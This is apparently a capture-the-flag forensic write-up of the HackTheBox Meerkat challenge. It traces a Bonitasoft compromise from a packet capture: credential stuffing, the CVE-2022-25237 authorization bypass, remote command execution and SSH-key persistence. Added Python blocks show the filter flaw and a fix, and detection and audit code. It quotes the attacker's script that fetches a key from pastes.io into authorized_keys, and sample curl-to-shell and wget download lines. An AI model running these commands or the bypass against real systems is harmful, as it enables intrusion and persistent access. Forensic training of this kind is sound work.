This is a writeup for the HackTheBox Meerkat challenge.
Task 1: We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?
After downloading the PCAP file and opening it in Wireshark, the “Protocol Hierarchy Statistics” view shows that the majority of the traffic is HTTP.
 
To filter for HTTP traffic, simply use the “http” keyword in the Wireshark display filter bar.
 
Immediately upon filtering for HTTP traffic you’ll notice a lot of paths with the ‘/bonita’ prefix. A simple Google search for Bonita Business Management Platform shows that the full name is actually ‘Bonitasoft’, which is also the first flag.
Task 2: We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?
When investigating the large number of POST requests to /bonita/loginservice you’ll notice that most (if not all) of them contain a unique combination of username and password. This differs from a ‘traditional’ brute force, where an attacker picks a particular username and iterates over candidate passwords for it, and from password spraying, where a few passwords are tried against many accounts. Trying many distinct username:password pairs, typically taken from a list of leaked credentials, is called ‘credential stuffing’.
 
Task 3: Does the vulnerability exploited have a CVE assigned - and if so, which one?
The task also included a JSON file with IDS alert details. The alerts contain a unique field called ‘cve’ and a potential CVE listed in the signature name. The CVE listed in the alert/signature is ‘CVE-2022-25237’
Task 4: Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?
Going back to the PCAP: most of the POST requests to the API return a 401 (Unauthorized). Scrolling through the requests, you’ll see multiple successful (200) POST and GET requests to paths containing ‘i18ntranslation’. This string is appended to each request to bypass the authorization filter.
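The bug behind Task 4, an authorization filter that is defeated by appending a string to an API path, is easiest to understand in code. The block below is an added illustration written for this writeup, not Bonita’s actual filter: it models the flaw class (an exemption implemented as a substring match on the whole URL) next to a corrected check that decides on the canonical path only. The protected prefix, the exclusion token and the single exempt path /bonita/API/system/i18ntranslation are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Assumed layout for this illustration (not taken from Bonita's source):
# everything under the API prefix needs a session, except one translation
# resource that the UI must be able to fetch before login.
PROTECTED_PREFIX = "/bonita/API/"
EXCLUDED_TOKENS = ("i18ntranslation",)
ALLOWED_UNAUTHENTICATED = {"/bonita/API/system/i18ntranslation"}


def vulnerable_requires_auth(url):
    """Flawed check: the exemption is a substring match on the whole URL.

    Any request that carries the token anywhere (query string, matrix
    parameter, extra path segment) skips authorization entirely.
    """
    if any(token in url for token in EXCLUDED_TOKENS):
        return False
    return url.startswith(PROTECTED_PREFIX)


def canonical_path(url):
    """Path with query, fragment, matrix parameters and dot segments removed."""
    segments = []
    for seg in urlsplit(url).path.split("/"):
        seg = seg.split(";", 1)[0]        # drop ';key=value' matrix parameters
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def fixed_requires_auth(url):
    """Corrected check: exempt only an exact allow-listed canonical path."""
    path = canonical_path(url)
    if path in ALLOWED_UNAUTHENTICATED:
        return False
    return path.startswith(PROTECTED_PREFIX)


def compare(urls):
    """(url, vulnerable_decision, fixed_decision) for each request."""
    return [(u, vulnerable_requires_auth(u), fixed_requires_auth(u)) for u in urls]


if __name__ == "__main__":
    # Constructed request paths; the bypass variants append the token to a
    # protected API path, as the writeup describes.
    for url, vuln, fixed in compare([
        "/bonita/API/bpm/process",
        "/bonita/API/bpm/process?i18ntranslation",
        "/bonita/API/bpm/process;i18ntranslation",
        "/bonita/API/system/i18ntranslation",
    ]):
        print(f"{url:50} vulnerable={vuln!s:5} fixed={fixed}")
```

The fix does two things the flawed version does not: it normalises the request path before deciding (so `?i18ntranslation`, `;i18ntranslation` and dot segments cannot change the outcome) and it exempts an exact resource rather than “anything containing the token”. When auditing a filter of this kind, test exactly those appended forms against a protected endpoint and expect 401 for all of them.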
 
Task 5: How many combinations of usernames and passwords were used in the credential stuffing attack?
Since we’ve seen the credential stuffing requests against ‘/bonita/loginservice’, we can use tshark to export the POST bodies and count the unique users. The command I used was:
tshark -r meerkat.pcap -Y 'http.request.method == POST && http.request.uri == "/bonita/loginservice"' -T fields -e http.file_data > bruteforce.txt
To decode the content and iterate over the users I wrote a small Python script to count the unique usernames.
from urllib.parse import parse_qs

unique_users = set()
# Open the previously exported bruteforce file (one POST body per line)
with open('bruteforce.txt', 'r') as bruteforce_file:
    for line in bruteforce_file:
        line = line.strip()
        # Skip requests that had no body
        if not line:
            continue
        # My tshark version printed http.file_data as a hex string; newer
        # versions print the body as plain text, so fall back to the raw line
        try:
            content = bytes.fromhex(line).decode()
        except ValueError:
            content = line
        ## The install user is also present in the bruteforce
        ## but for some reason this did not count as a valid user for the challenge
        if 'install' in content:
            continue
        # Parse the URL-encoded form body (username=...&password=...) and
        # add the decoded username to our unique_users set
        fields = parse_qs(content)
        username = fields.get('username', [''])[0]
        if username:
            unique_users.add(username)
# Print the count of unique users in the set
print(len(unique_users))
Running the script should return 56 unique users.
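The attack classification from Task 2 and the decoding, counting and success check from Tasks 5 and 6 can be done in one pass over the exported request bodies. The block below is an added example, not the writeup’s own script: it accepts both the hex and the plain-text form of tshark’s http.file_data output, labels the attack from how usernames and passwords are combined, counts the unique combinations, and picks out the attempt the server accepted. The sample bodies and status codes are constructed for the example; the real export is the file produced by the tshark command above, which carries no status codes, so pairing bodies with responses needs an export that also selects http.response.code.

```python
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample (not data from the challenge): POST /bonita/loginservice
# form bodies and the status code of the matching response. 401 = rejected,
# 204 = the one accepted login, shaped like the traffic the writeup describes.
SAMPLE_LOGINS = [
    ("username=alice%40example.test&password=Summer2022%21&_l=en", 401),
    ("username=bob%40example.test&password=hunter2&_l=en", 401),
    ("username=install&password=install&_l=en", 401),
    ("username=carol%40example.test&password=letmein&_l=en", 401),
    ("username=dave%40example.test&password=g0vernm3nt&_l=en", 204),
]


def decode_export_line(line):
    """Decode one line of `tshark -T fields -e http.file_data` output.

    Some tshark versions print the body as hex, others as plain text; a line
    that is not valid hex is taken as-is. (A plain-text body made only of hex
    digits would be mis-decoded, which form bodies never are.)
    """
    line = line.strip()
    try:
        return bytes.fromhex(line).decode("utf-8", errors="replace")
    except ValueError:
        return line


def parse_login(body):
    """(username, password) from a URL-encoded login body, or None."""
    fields = parse_qs(body, keep_blank_values=True)
    if "username" not in fields or "password" not in fields:
        return None
    return fields["username"][0], fields["password"][0]


def classify_attack(pairs):
    """Label the attack by how usernames and passwords are combined.

    brute force:         one account, many passwords
    password spraying:   a few passwords tried across many accounts
    credential stuffing: every attempt is a distinct user:password pair and
                         no account is tried more than twice
    """
    if len(pairs) < 2:
        return "too few attempts"
    per_user = Counter(u for u, _ in pairs)
    per_password = Counter(p for _, p in pairs)
    if len(per_user) == 1:
        return "brute force"
    if len(per_password) * 4 <= len(per_user):
        return "password spraying"
    if max(per_user.values()) <= 2 and len(set(pairs)) == len(pairs):
        return "credential stuffing"
    return "mixed"


def count_combinations(pairs, exclude=("install",)):
    """Unique user:password combinations, skipping built-in accounts such as
    Bonita's 'install' user, which the challenge did not count."""
    return len({p for p in set(pairs) if p[0] not in exclude})


def successful_logins(records):
    """(username, password) for every attempt answered with 204."""
    hits = []
    for body, status in records:
        pair = parse_login(body)
        if status == 204 and pair:
            hits.append(pair)
    return hits


def analyse(records):
    pairs = [p for p in (parse_login(b) for b, _ in records) if p]
    return {
        "attack": classify_attack(pairs),
        "combinations": count_combinations(pairs),
        "successful": successful_logins(records),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_LOGINS))
```

The thresholds in classify_attack are heuristics: a single account being hammered is unambiguous, but the line between spraying and stuffing depends on how many passwords repeat, so on a real export look at the Counter values before trusting the label.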
Task 6: Which username and password combination was successful?
Going back to the PCAP file, only a single POST request to ‘/bonita/loginservice’ was successful, indicated by a 204 (No Content) response where every other attempt got a 401. The form body of that request holds the following username/password combination: [email protected]:g0vernm3nt
 
Task 7: If any, which text sharing site did the attacker utilise?
Eventually the attacker performs several GET requests to a path containing “rce” to execute commands on the host. You can apply the Wireshark filter ‘http.request.uri contains "rce"’ to list them. Among them is a request in which wget is used to download a file from pastes.io: https://pastes.io/raw/bx5gcr0et8/
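When the commands are carried in the query string of those “rce” requests, they can be pulled out of the exported URIs and checked for download-and-execute behaviour in bulk rather than by scrolling. The block below is an added example written for this writeup, not a tool from the challenge: it URL-decodes the request URIs, links a download that saves to a local path with a later command that runs that path, and flags one-liners that pipe a download straight into an interpreter. The parameter name `cmd`, the endpoint path and the sample URIs are constructed assumptions and not taken from the PCAP.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request URIs (assumption: the command travels in a `cmd`
# parameter). The pastes.io URL is the one named in the writeup; the other
# host is a documentation address.
SAMPLE_RCE_URIS = [
    "/bonita/API/extension/rce?p=0&c=1&cmd=id",
    "/bonita/API/extension/rce?p=0&c=1&cmd=wget%20https%3A%2F%2Fpastes.io%2Fraw%2Fbx5gcr0et8%2F%20-O%20%2Ftmp%2Fcron",
    "/bonita/API/extension/rce?p=0&c=1&cmd=bash%20%2Ftmp%2Fcron",
    "/bonita/API/extension/rce?p=0&c=1&cmd=curl%20-s%20http%3A%2F%2F198.51.100.7%2Fx.sh%20%7C%20sh",
]

URL_RE = re.compile(r"https?://[^\s'\"|;&>]+")
DOWNLOADERS = {"wget", "curl"}
INTERPRETERS = {"bash", "sh", "python", "python3", "perl"}


def extract_commands(uris, param="cmd"):
    """URL-decoded command strings found in the given query parameter."""
    commands = []
    for uri in uris:
        commands.extend(parse_qs(urlsplit(uri).query).get(param, []))
    return commands


def words(cmd):
    """Split a shell one-liner on whitespace and the |, ; and & separators."""
    return [w for w in re.split(r"[\s|;&]+", cmd) if w]


def download_urls(cmd):
    return URL_RE.findall(cmd)


def analyse_commands(commands):
    """Link downloads to later executions of the fetched file, and flag
    commands that pipe a download directly into an interpreter."""
    fetched = {}        # local path -> URL it was downloaded from
    findings = []
    for cmd in commands:
        toks = words(cmd)
        if not toks:
            continue
        # executions of something fetched by an earlier command
        for tok in toks[1:]:
            if tok in fetched:
                findings.append(("execute-downloaded", fetched[tok], cmd))
        urls = download_urls(cmd)
        if toks[0] in DOWNLOADERS and urls:
            # wget -O <path> / curl -o <path>: remember where it was saved
            for i, tok in enumerate(toks[:-1]):
                if tok in ("-O", "-o"):
                    fetched[toks[i + 1]] = urls[0]
            if any(tok in INTERPRETERS for tok in toks[1:]):
                findings.append(("pipe-to-shell", urls[0], cmd))
    hosts = sorted({urlsplit(u).hostname for c in commands for u in download_urls(c)})
    return {"hosts": hosts, "findings": findings}


if __name__ == "__main__":
    cmds = extract_commands(SAMPLE_RCE_URIS)
    for c in cmds:
        print("cmd:", c)
    print(analyse_commands(cmds))
```

The hosts list is what answers a “which text sharing site” question quickly; the findings list is what tells you which downloaded file to go and read next.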
 
Task 8: Please provide the filename of the public key used by the attacker to gain persistence on our host.
When investigating the content of the downloaded file, you’ll notice another file being downloaded from the same domain:
#!/bin/bash
curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
sudo service ssh restart
The content of hffgra4unv, the attacker’s public key, is appended to /home/ubuntu/.ssh/authorized_keys, giving the attacker SSH access as the ubuntu user that survives the web exploit. The ssh service restart is not actually required for the new key to work, since sshd reads authorized_keys at each login attempt.
Task 10: Can you confirm the file modified by the attacker to gain persistence?
As shown in the script above, the attacker appended to /home/ubuntu/.ssh/authorized_keys.
Task 11: Can you confirm the MITRE technique ID of this type of persistence mechanism?
This particular method of persistence is documented as T1098.004, “Account Manipulation: SSH Authorized Keys”. The other persistence techniques are documented under the Persistence tactic at https://attack.mitre.org/tactics/TA0003/.
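For the persistence mechanism in Tasks 8 to 11, the practical follow-up on a live host is to audit authorized_keys rather than just note that it changed. The block below is an added example, not part of the writeup or of any challenge artefact: it parses the authorized_keys format (optional options, key type, base64 blob, comment), computes each key’s SHA256 fingerprint the way ssh-keygen -lf prints it, checks that the declared type matches the algorithm name inside the blob, and reports every key that is not in a known-good baseline. The sample file, both keys in it (built from fixed bytes) and the comments are constructed for the example.

```python
import base64
import hashlib
import struct

KEY_TYPES = {
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com",
}


def _ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _ed25519_blob(raw32):
    """Public key blob layout for ssh-ed25519: string type, string 32-byte key."""
    return _ssh_string(b"ssh-ed25519") + _ssh_string(raw32)


def _b64(data):
    return base64.b64encode(data).decode()


def fingerprint(blob):
    """SHA256 fingerprint in the notation used by `ssh-keygen -lf`."""
    return "SHA256:" + _b64(hashlib.sha256(blob).digest()).rstrip("=")


# Constructed keys (fixed bytes, not real key material) and a constructed file.
KNOWN_BLOB = _ed25519_blob(bytes(range(32)))
ROGUE_BLOB = _ed25519_blob(bytes(range(32, 64)))
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# admin workstation key, deployed at build time",
    f"ssh-ed25519 {_b64(KNOWN_BLOB)} ubuntu@admin-ws",
    f'no-pty,command="/bin/true" ssh-ed25519 {_b64(ROGUE_BLOB)} user@pastes',
    f"ssh-rsa {_b64(ROGUE_BLOB)} mislabelled",
])


def _split_options(line):
    """(options, rest): options end at the first space outside double quotes."""
    if line.split(None, 1)[0] in KEY_TYPES:
        return "", line
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            return line[:i], line[i + 1:].lstrip()
    return line, ""


def parse_authorized_keys(text):
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        options, rest = _split_options(line)
        parts = rest.split(None, 2)
        entry = {"line": lineno, "options": options, "problems": []}
        entries.append(entry)
        if len(parts) < 2 or parts[0] not in KEY_TYPES:
            entry["problems"].append("unparseable")
            continue
        entry["type"] = parts[0]
        entry["comment"] = parts[2] if len(parts) == 3 else ""
        try:
            blob = base64.b64decode(parts[1], validate=True)
        except ValueError:
            entry["problems"].append("bad base64")
            continue
        entry["fingerprint"] = fingerprint(blob)
        # The first SSH string inside the blob names the real algorithm.
        n = struct.unpack(">I", blob[:4])[0] if len(blob) >= 4 else -1
        if blob[4:4 + n] != parts[0].encode():
            entry["problems"].append("declared type does not match key blob")
    return entries


def audit(text, baseline_fingerprints):
    """Entries whose fingerprint is not in the baseline or that failed a check."""
    return [e for e in parse_authorized_keys(text)
            if e.get("fingerprint") not in baseline_fingerprints or e["problems"]]


if __name__ == "__main__":
    for e in audit(SAMPLE_AUTHORIZED_KEYS, {fingerprint(KNOWN_BLOB)}):
        print(e)
```

Fingerprints rather than raw base64 are the right thing to baseline and to search for across hosts, since the same key can appear with different options or comments. Options such as a forced command are not evidence of compromise on their own, but a key that is both unknown and carries options is worth looking at first.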